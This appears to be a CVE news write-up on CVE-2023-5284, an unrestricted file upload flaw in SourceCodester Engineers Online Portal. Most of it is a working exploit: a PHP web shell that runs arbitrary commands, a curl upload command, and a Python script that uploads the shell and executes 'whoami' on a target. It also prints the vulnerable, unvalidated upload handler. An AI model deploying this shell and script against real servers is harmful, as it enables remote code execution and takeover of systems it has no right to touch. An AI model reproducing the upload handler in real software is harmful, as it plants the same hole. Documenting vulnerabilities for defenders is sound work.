CVE CyberSecurity Database News

CVE-2023-5284 - Critical Unrestricted File Upload in SourceCodester Engineers Online Portal 1. (Exploit & Analysis)

Poster -

A new critical vulnerability has been discovered in SourceCodester Engineers Online Portal 1., specifically in the upload_save_student.php script. Tracked as CVE-2023-5284 (also referenced as VDB-240912), this security issue allows attackers to upload arbitrary files to the server, potentially leading to remote code execution. This write-up explores the vulnerability, demonstrates the exploit with code snippets, and provides original references for further reading.

What is SourceCodester Engineers Online Portal?

SourceCodester Engineers Online Portal is a web-based system for managing student and faculty interactions in engineering colleges. Built using PHP and MySQL, it helps automate course submissions, schedules, and communications online.

The Vulnerability Explained

CVE-2023-5284 is an *unrestricted file upload* bug. The issue lies in how the upload_save_student.php handles the uploaded_file argument. The absence of proper validation allows attackers to upload dangerous files, such as PHP shells, which can then be accessed and executed remotely.

Attack Vector: Remote

- CVE: CVE-2023-5284
- Vulnerability Database Entry: VDB-240912

How the Exploit Works

The core issue is a missing restriction on the uploaded file type or content. If an attacker sends a malicious .php file with the right request, the server saves it to a web-accessible directory. The attacker can then access and run that file from the browser.

Vulnerable PHP Code Snippet (upload_save_student.php)

<?php
if(isset($_FILES['uploaded_file'])){
    $file_name = $_FILES['uploaded_file']['name'];
    $file_tmp = $_FILES['uploaded_file']['tmp_name'];
    move_uploaded_file($file_tmp, "uploads/" . $file_name);
    echo "File uploaded!";
}
// ...rest of the code
?>

1. Create a Malicious PHP Shell

Let's craft a simple web shell for demonstration (never use this outside of legal testing environments):

<?php
if(isset($_REQUEST['cmd'])){
  echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>

Save this as shell.php.

You can upload the shell using a simple cURL command

curl -F "uploaded_file=@shell.php" https://target-site.com/upload_save_student.php

If successful, the output will say File uploaded!, and your file will be at

https://target-site.com/uploads/shell.php

Now, run any command remotely via your browser

https://target-site.com/uploads/shell.php?cmd=whoami

Here’s a quick Python3 script to automate the upload and command execution

import requests

url = "https://target-site.com/upload_save_student.php"
shell = {'uploaded_file': open('shell.php', 'rb')}
r = requests.post(url, files=shell)
if "File uploaded!" in r.text:
    print("[+] Shell uploaded successfully!")
    shell_url = "https://target-site.com/uploads/shell.php?cmd=whoami"
    print("[+] Access shell at: ", shell_url)
    result = requests.get(shell_url)
    print(result.text)
else:
    print("[-] Upload failed.")

Original References

- National Vulnerability Database: CVE-2023-5284
- VulDB: VDB-240912
- Official GitHub/SourceCodester Page (for context, not docs on fix)

Conclusion

CVE-2023-5284 is a serious bug in SourceCodester Engineers Online Portal 1. that allows anyone to upload and run malicious files remotely. Administrators using this platform should immediately restrict file uploads and apply any patches or mitigations. Always sanitize and validate all user inputs, especially when dealing with file uploads!

Timeline

Published on: 09/29/2023 20:15:10 UTC
Last modified on: 11/07/2023 04:23:47 UTC